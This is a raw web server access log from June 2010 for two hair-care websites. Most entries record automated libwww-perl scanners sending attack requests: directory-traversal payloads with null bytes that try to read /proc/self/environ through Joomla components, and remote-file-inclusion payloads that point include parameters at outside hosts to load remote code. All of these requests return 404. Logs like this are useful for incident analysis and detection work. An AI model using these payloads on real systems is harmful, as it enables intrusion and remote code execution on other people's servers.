65.60.49.18 - - [20/Jun/2010:17:30:59 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.freehairsecrets.com"
65.60.49.18 - - [20/Jun/2010:17:30:59 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.freehairsecrets.com"
65.60.49.18 - - [20/Jun/2010:17:30:59 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.freehairsecrets.com"
78.110.50.135 - - [20/Jun/2010:17:31:21 -0700] "GET /logs/access_100201.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
78.110.50.135 - - [20/Jun/2010:17:31:22 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
78.110.50.135 - - [20/Jun/2010:17:31:22 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
78.110.50.135 - - [20/Jun/2010:17:31:22 -0700] "GET /logs/access_100125.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
91.121.210.81 - - [20/Jun/2010:17:31:47 -0700] "GET /logs/access_100201.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.210.81 - - [20/Jun/2010:17:31:47 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.210.81 - - [20/Jun/2010:17:31:47 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.210.81 - - [20/Jun/2010:17:31:47 -0700] "GET /logs/access_100125.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:31:50 -0700] "GET /logs/access_100419.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:31:50 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:31:50 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
178.208.83.28 - - [20/Jun/2010:17:31:58 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
178.208.83.28 - - [20/Jun/2010:17:32:13 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:32:30 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.freehairsecrets.com"
65.60.49.18 - - [20/Jun/2010:17:32:30 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.freehairsecrets.com"
65.60.49.18 - - [20/Jun/2010:17:32:30 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.freehairsecrets.com"
65.60.49.18 - - [20/Jun/2010:17:32:31 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:32:47 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
178.208.83.28 - - [20/Jun/2010:17:33:03 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
78.110.50.135 - - [20/Jun/2010:17:33:10 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
178.208.83.28 - - [20/Jun/2010:17:33:28 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
183.180.127.14 - - [20/Jun/2010:17:33:38 -0700] "GET /logs/access.log/*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
183.180.127.14 - - [20/Jun/2010:17:33:38 -0700] "GET /*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
183.180.127.14 - - [20/Jun/2010:17:33:39 -0700] "GET /logs/*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:34:24 -0700] "GET /logs/access_100419.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:34:24 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:34:24 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
78.110.50.135 - - [20/Jun/2010:17:34:25 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
65.60.49.18 - - [20/Jun/2010:17:34:29 -0700] "GET /logs/access_100419.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:34:29 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:34:30 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
78.110.50.135 - - [20/Jun/2010:17:34:36 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
65.60.49.18 - - [20/Jun/2010:17:34:49 -0700] "GET /logs/access_100503.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:35:13 -0700] "GET /logs/access_100405.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:35:13 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:35:13 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:37:12 -0700] "GET /logs/access_100531.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:37:25 -0700] "GET /logs/access_100419.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:37:25 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:37:25 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
78.110.50.135 - - [20/Jun/2010:17:37:29 -0700] "GET /logs/access_100531.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
78.110.50.135 - - [20/Jun/2010:17:37:46 -0700] "GET /logs/access_100125.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
78.110.50.135 - - [20/Jun/2010:17:37:46 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
78.110.50.135 - - [20/Jun/2010:17:37:46 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
77.88.25.28 - - [20/Jun/2010:17:40:19 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13327 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
91.121.210.81 - - [20/Jun/2010:17:40:24 -0700] "GET /logs/access_100201.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.210.81 - - [20/Jun/2010:17:40:24 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.210.81 - - [20/Jun/2010:17:40:25 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
78.110.50.135 - - [20/Jun/2010:17:40:48 -0700] "GET /logs/access_100201.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
91.121.210.81 - - [20/Jun/2010:17:41:05 -0700] "GET /logs/access_100125.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:42:18 -0700] "GET /logs/access_100405.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:42:18 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:42:18 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:43:34 -0700] "GET /logs/access_100503.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:43:34 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:43:34 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
91.121.210.81 - - [20/Jun/2010:17:43:52 -0700] "GET /logs/access_100201.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.210.81 - - [20/Jun/2010:17:43:52 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.210.81 - - [20/Jun/2010:17:43:52 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
174.121.188.69 - - [20/Jun/2010:17:44:09 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
174.121.188.69 - - [20/Jun/2010:17:44:20 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
91.121.210.81 - - [20/Jun/2010:17:44:21 -0700] "GET /logs/access_100125.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
174.121.188.69 - - [20/Jun/2010:17:44:43 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
69.163.162.245 - - [20/Jun/2010:17:44:49 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
174.121.188.69 - - [20/Jun/2010:17:44:53 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
91.121.210.81 - - [20/Jun/2010:17:45:53 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
91.121.210.81 - - [20/Jun/2010:17:45:53 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
91.121.210.81 - - [20/Jun/2010:17:45:54 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
77.88.25.28 - - [20/Jun/2010:17:46:17 -0700] "GET /freehairsecretsphp/viewtopic.php?p=906 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:47:36 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.freehairsecrets.com"
65.60.49.18 - - [20/Jun/2010:17:47:36 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.freehairsecrets.com"
65.60.49.18 - - [20/Jun/2010:17:47:36 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.freehairsecrets.com"
65.60.49.18 - - [20/Jun/2010:17:48:05 -0700] "GET /logs/access_100531.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:48:05 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:48:05 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:48:45 -0700] "GET /logs/access_100503.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
211.43.212.49 - - [20/Jun/2010:17:51:48 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.49 - - [20/Jun/2010:17:51:59 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:52:08 -0700] "GET /logs/access_100405.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
174.121.176.46 - - [20/Jun/2010:17:52:19 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
174.121.176.46 - - [20/Jun/2010:17:52:58 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
178.208.83.28 - - [20/Jun/2010:17:53:52 -0700] "GET /logs/access_100531.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
178.208.83.28 - - [20/Jun/2010:17:53:52 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
178.208.83.28 - - [20/Jun/2010:17:53:52 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.121.64.231 - - [20/Jun/2010:17:54:08 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
174.121.64.231 - - [20/Jun/2010:17:54:11 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
174.121.64.231 - - [20/Jun/2010:17:54:11 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:17:54:22 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:17:54:22 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:17:54:23 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
174.121.64.231 - - [20/Jun/2010:17:54:35 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
